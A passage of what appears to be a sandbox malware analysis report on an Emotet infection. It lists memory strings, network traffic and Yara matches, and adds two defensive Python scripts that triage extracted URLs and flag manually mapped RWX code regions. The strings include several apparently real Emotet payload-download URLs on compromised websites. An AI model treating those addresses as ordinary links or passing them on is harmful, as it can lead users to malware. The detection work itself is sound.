                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/02
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0%
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.o
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: http://riandutra.com
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: http://riandutra.com/email/AfhE8z0/
                      Source: powershell.exe, 00000005.00000002.2107547753.0000000002330000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: powershell.exe, 00000005.00000002.2112621761.000000001D2F0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2107547753.0000000002330000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2125133029.0000000002820000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: powershell.exe, 00000005.00000003.2101978050.000000001B631000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: powershell.exe, 00000005.00000002.2111132973.0000000003B72000.00000004.00000001.sdmpString found in binary or memory: http://www.litespeedtech.com
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2102349882.0000000000224000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000005.00000002.2102349882.0000000000224000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: https://hbprivileged.com
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: https://hbprivileged.com/cgi-bin/Qg/
                      Source: powershell.exe, 00000005.00000002.2111189798.0000000003C06000.00000004.00000001.sdmpString found in binary or memory: https://hbprivileged.comh
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: https://mrveggy.com
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: https://mrveggy.com/wp-admin/n/
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2111132973.0000000003B72000.00000004.00000001.sdmpString found in binary or memory: https://norailya.com
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: https://norailya.com/drupal/retAl/
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                      Source: powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: https://ummahstars.com
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: https://ummahstars.com/app_old_may_2018/assets/wDL8x/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: https://www.teelekded.com/cgi-bin/LPo/
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: https://www.teelekded.com/cgi-bin/LPo/P
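The seven "Potential dropper URLs" pulled from powershell.exe memory earlier in this section reappear among the "String found in binary or memory" rows above, mixed with dozens of CRL, OCSP and CA policy URLs, Microsoft resource links and strings from software on the sandbox. Many of the PKI URLs end in "0", "0%", "0D" or "05": a URL embedded in a DER-encoded certificate is followed in memory by the next tag byte, usually 0x30 (SEQUENCE, ASCII "0"), and a length byte, so the string extractor drags that structure along. The triage script below is an added example for this page, not part of the report or of any Joe Sandbox tooling: it parses rows in the report's own format, strips the DER tail, classifies each URL as CA/vendor noise, an Emotet-style stage-two URL (directory segments ending in a short random token and a trailing slash), or unclassified, and folds bare-host and garbled copies ("hbprivileged.comh", ".../LPo/P") into the candidate they belong to. The allow-list of benign hosts is hand-built from this report and is an assumption, not a vetted list; the sample rows are copied from the report.

```python
import re
from urllib.parse import urlparse

# Constructed sample: rows copied from this report, in its fused
# "Source: <process>, <dump>String found in ... memory: <url>" shape.
SAMPLE_ROWS = """\
Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: http://riandutra.com/email/AfhE8z0/
Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://mrveggy.com/wp-admin/n/
Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://hbprivileged.com/cgi-bin/Qg/
Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://www.teelekded.com/cgi-bin/LPo/
Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: https://hbprivileged.com
Source: powershell.exe, 00000005.00000002.2111189798.0000000003C06000.00000004.00000001.sdmpString found in binary or memory: https://hbprivileged.comh
Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: https://www.teelekded.com/cgi-bin/LPo/P
Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-1814.crl0
Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000005.00000002.2102349882.0000000000224000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2112621761.000000001D2F0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
"""

URL_RE = re.compile(r"String found in (?:binary or )?memory: (https?://\S+)")

# Assumption: allow-list hand-built from the hosts in this report (CA revocation and
# policy endpoints, Microsoft/MSN resources, software present on the sandbox).
BENIGN_HOST_SUFFIXES = (
    "microsoft.com", "windowsupdate.com", "windowsmedia.com", "msn.com", "windows.com",
    "godaddy.com", "comodoca.com", "comodo.com", "sectigo.com", "entrust.net",
    "letsencrypt.org", "lencr.org", "identrust.com", "globalsign.net",
    "pkioverheid.nl", "diginotar.nl", "digicert.com.my", "piriform.com",
    "xmlsoap.org", "icra.org", "litespeedtech.com",
)
PKI_HOST_PREFIXES = ("crl.", "ocsp.", "crt.", "cps.", "certs.", "certificates.")
PKI_PATH_RE = re.compile(r"\.(?:crl|crt|p7c)$|/cps\b", re.I)
# Emotet-style stage-two path: directory segments, then a short random token, then "/".
DROPPER_PATH_RE = re.compile(r"^(?:/[A-Za-z0-9_.-]+)+/[A-Za-z0-9]{1,12}/$")
# Trailing DER bytes behind a URL lifted from a certificate: 0x30 ('0') plus a length byte.
DER_TAIL_RE = re.compile(r"0[^/]?$")


def strip_der_tail(url):
    return DER_TAIL_RE.sub("", url)


def classify(url):
    u = urlparse(strip_der_tail(url))
    host = (u.hostname or "").lower()
    if host.startswith(PKI_HOST_PREFIXES) or PKI_PATH_RE.search(u.path):
        return "benign-infra"
    if any(host == s or host.endswith("." + s) for s in BENIGN_HOST_SUFFIXES):
        return "benign-infra"
    if DROPPER_PATH_RE.match(u.path):
        return "dropper-candidate"
    return "unclassified"


def triage(report_text):
    buckets = {"dropper-candidate": set(), "dropper-variant": set(),
               "benign-infra": set(), "unclassified": set()}
    for m in URL_RE.finditer(report_text):
        buckets[classify(m.group(1))].add(m.group(1))
    # A bare host or a garbled copy of a candidate is the same IOC: fold it in by
    # host prefix (prefix, not equality, so "hbprivileged.comh" still folds).
    hosts = {urlparse(u).hostname for u in buckets["dropper-candidate"]}
    for url in sorted(buckets["unclassified"]):
        host = urlparse(url).hostname or ""
        if any(host.startswith(h) for h in hosts):
            buckets["unclassified"].remove(url)
            buckets["dropper-variant"].add(url)
    return {k: sorted(v) for k, v in buckets.items()}


if __name__ == "__main__":
    for bucket, urls in triage(SAMPLE_ROWS).items():
        print(bucket)
        for u in urls:
            print("   ", u)
```

Only the "dropper-candidate" bucket is worth blocking or hunting on; the variants are evidence that the same string lived in several heap regions. The DER strip is a triage heuristic: it would also clip a legitimate URL that happens to end in "0" plus one character, which is harmless here because classification only looks at the host and the path shape.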
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
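Every memory row in this section names its source with an identifier such as 00000005.00000002.2110898190.000000001CC80000.00000002.00000001.sdmp, and the Yara matches in the E-Banking Fraud section below use the same format next to identifiers like 17.2.rundll32.exe.240000.1.unpack. The two are consistent: the first sdmp field is the PID in hex (0x11 is 17, 0x12 is 18, 0x0E is 14) and the fourth is the region base address. The decoder below is an added example for this page, not Joe Sandbox code: it reads both identifier styles, labels the fifth field with the Windows PAGE_* protection constants, and lists every process holding an execute-read-write region at 0x10000000, the default image base the MSVC linker gives DLLs. A real loader-mapped DLL would not normally sit at that address with RWX protection, so the combination is the signature of a manually mapped payload, which is exactly what the rundll32.exe matches below show. Reading the fifth field as a page protection and the naming of the other fields are this example's assumptions, supported only by the PID correspondence visible in the report and by the values observed (0x02, 0x04 for ordinary dumps, 0x40 for the unpacked Emotet regions); the sixth field is left undecoded. The sample report text is copied from this page.

```python
import re
from collections import defaultdict

# Windows memory protection constants (winnt.h).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Default image base the MSVC linker assigns to DLLs.
DEFAULT_DLL_IMAGE_BASE = 0x10000000

# Assumed field layout: <pid hex>.<run hex>.<dump id>.<base hex>.<protection hex>.<flags hex>.sdmp
SDMP_RE = re.compile(
    r"\b([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp")
# Assumed field layout: <pid>.<run>.<image>.<base hex>.<index>[.raw].unpack
UNPACK_RE = re.compile(r"\b(\d+)\.(\d+)\.([\w-]+\.exe)\.([0-9A-Fa-f]+)\.(\d+)(?:\.raw)?\.unpack\b")

# Constructed sample: rows copied from this report.
SAMPLE_REPORT = """\
Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: http://riandutra.com/email/AfhE8z0/
Source: rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: Yara matchFile source: 00000011.00000002.2222429242.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.2217818929.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000002.2127750584.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000002.2124233296.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.2336996681.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 17.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
"""


def parse_sdmp(ident):
    m = SDMP_RE.search(ident)
    if not m:
        raise ValueError(f"not a memory-dump identifier: {ident}")
    pid, run, dump_id, base, protect, flags = m.groups()
    protect = int(protect, 16)
    return {"pid": int(pid, 16), "run": int(run, 16), "dump_id": int(dump_id),
            "base": int(base, 16), "protect": protect,
            "protect_name": PAGE_PROTECTION.get(protect, f"0x{protect:x}"),
            "flags": int(flags, 16)}   # meaning not decoded


def parse_unpack(ident):
    m = UNPACK_RE.search(ident)
    if not m:
        raise ValueError(f"not an unpacked-PE identifier: {ident}")
    pid, run, image, base, index = m.groups()
    return {"pid": int(pid), "run": int(run), "image": image,
            "base": int(base, 16), "index": int(index)}


def process_map(report_text):
    """pid -> image name, from the "<image>, <pid hex>." prefix of memory rows and
    from the decimal pid in unpack identifiers."""
    images = {}
    for m in re.finditer(r"([\w-]+\.exe), ([0-9A-Fa-f]{8})\.", report_text):
        images.setdefault(int(m.group(2), 16), m.group(1))
    for m in UNPACK_RE.finditer(report_text):
        images.setdefault(int(m.group(1)), m.group(3))
    return images


def executable_regions(report_text):
    """pid -> sorted (base, protection) for every dump whose protection has an execute bit."""
    regions = defaultdict(set)
    for m in SDMP_RE.finditer(report_text):
        d = parse_sdmp(m.group(0))
        if d["protect"] & 0xF0:          # PAGE_EXECUTE* values live in the high nibble
            regions[d["pid"]].add((d["base"], d["protect_name"]))
    return {pid: sorted(v) for pid, v in regions.items()}


def suspicious_dll_mappings(report_text):
    """Processes with an RWX region at the default DLL image base: manually mapped code."""
    images = process_map(report_text)
    hits = []
    for pid, regs in executable_regions(report_text).items():
        for base, name in regs:
            if base == DEFAULT_DLL_IMAGE_BASE and name == "PAGE_EXECUTE_READWRITE":
                hits.append((pid, images.get(pid, "?"), base))
    return sorted(hits)


if __name__ == "__main__":
    for pid, image, base in suspicious_dll_mappings(SAMPLE_REPORT):
        print(f"pid {pid} ({image}): RWX region at 0x{base:08x}")
```

Run over the full Yara list below, the same routine yields one hit per rundll32.exe process, which is the pattern to hunt for on live hosts: an RWX region at 0x10000000 inside rundll32.exe with no matching entry in the loaded-module list.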

                      E-Banking Fraud:

                      Yara detected Emotet
                      Source: Yara matchFile source: 00000011.00000002.2222429242.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2338162997.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2336996681.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2189259516.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2148553869.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2127750584.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2180397123.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2197905867.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2168489304.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2188156936.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2336963149.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2198949244.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2210754308.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2133960367.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2208025145.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2124233296.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2134645958.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2157336224.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2113528268.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2113590423.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2134026009.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2177327005.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2148272205.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2197927518.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2157365734.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2124067211.0000000000140000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000002.2208036737.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.2217818929.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.2159945715.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.2170332868.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000D.00000002.2177340948.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.2217846238.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.2149995465.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.2188168029.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.2168457347.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.rundll32.exe.6a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.rundll32.exe.710000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 14.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.rundll32.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 14.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
